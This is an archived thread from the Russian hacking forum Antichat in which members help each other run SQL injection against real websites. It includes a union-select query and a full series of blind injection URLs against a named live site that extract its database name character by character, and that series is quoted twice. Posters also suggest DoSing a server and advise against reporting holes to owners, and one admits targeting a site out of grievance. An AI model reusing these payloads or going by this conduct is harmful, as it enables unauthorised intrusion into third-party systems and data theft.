Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
10.06.2010, 16:23
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
и в том дело я незнаю как у него обстоят дела, для этого я привел пример под root-ом
а для того чтобы он узнал user-a привел пример как это узнать
насчет user-а можешь проверить запросом
http://test/news/php?id=1+union+select+1,user(),2,3--
|
|
|
10.06.2010, 16:59
|
|
Познающий
Регистрация: 21.05.2010
Сообщений: 37
Провел на форуме:
167126
Репутация:
55
|
|
либо просто задосить сервак бенчмарком(если ничего другого не получится)
и нахрена? не можешь сам раскрутить - забей на него, или опубликуй здесь, а не пали владельцу дыру.
Может кому-нибудь тут пригодится.
|
|
|
|
10.06.2010, 17:14
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279
Репутация:
55
|
|
Сообщение от qq6ka
и нахрена? не можешь сам раскрутить - забей на него, или опубликуй здесь, а не пали владельцу дыру.
Может кому-нибудь тут пригодится.
Дело немного в другом,я уже несколько месяцев ищу баги на том сайте(необоснованно мну там забанили и обматерили),и вот наконец-то нашел скулю на поддомене и чтоб сейчас ее постить в паблик,как-то нелогично и не разумно.Всем спасибо за помощь,буду пытаться что-то сделать...
|
|
|
|
10.06.2010, 19:26
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Не могу вывести database().
Код HTML:
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=2 and substring(version(),1,1)=5
|
|
|
|
10.06.2010, 19:40
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
там нету инъекции...
|
|
|
|
10.06.2010, 20:25
|
|
Новичок
Регистрация: 03.01.2009
Сообщений: 27
Провел на форуме:
367442
Репутация:
41
|
|
2 FlaktW
Код:
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),1,1))=0x64,2,1)
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),2,1))=0x62,2,1)
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),3,1))=0x31,2,1)
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),4,1))=0x39,2,1)
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),5,1))=0x37,2,1)
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),6,1))=0x35,2,1)
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),7,1))=0x31,2,1)
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),8,1))=0x33,2,1)
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),9,1))=0x5F,2,1)
db197513_ и так далее.. |
|
|
|
10.06.2010, 20:44
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Сообщение от BlackFan
2 FlaktW
Код:
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),1,1))=0x64,2,1)
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),2,1))=0x62,2,1)
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),3,1))=0x31,2,1)
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),4,1))=0x39,2,1)
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),5,1))=0x37,2,1)
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),6,1))=0x35,2,1)
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),7,1))=0x31,2,1)
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),8,1))=0x33,2,1)
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),9,1))=0x5F,2,1)
db197513_ и так далее..
Это скрипт или программа?
|
|
|
|
11.06.2010, 00:15
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
я думаю что в браузере это вводить надо) но можно как скрипт написать)
|
|
|
|
11.06.2010, 10:57
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
Подобрал ордером число колоно - 4
Выводу юнионом, возникает ошибка
Invalid query: Unknown table 'C1' in IN/ALL/ANY subquery
|
|
|
|
11.06.2010, 11:05
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от wildshaman
Подобрал ордером число колоно - 4
Выводу юнионом, возникает ошибка
Invalid query: Unknown table 'C1' in IN/ALL/ANY subquery
Двойной запрос...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
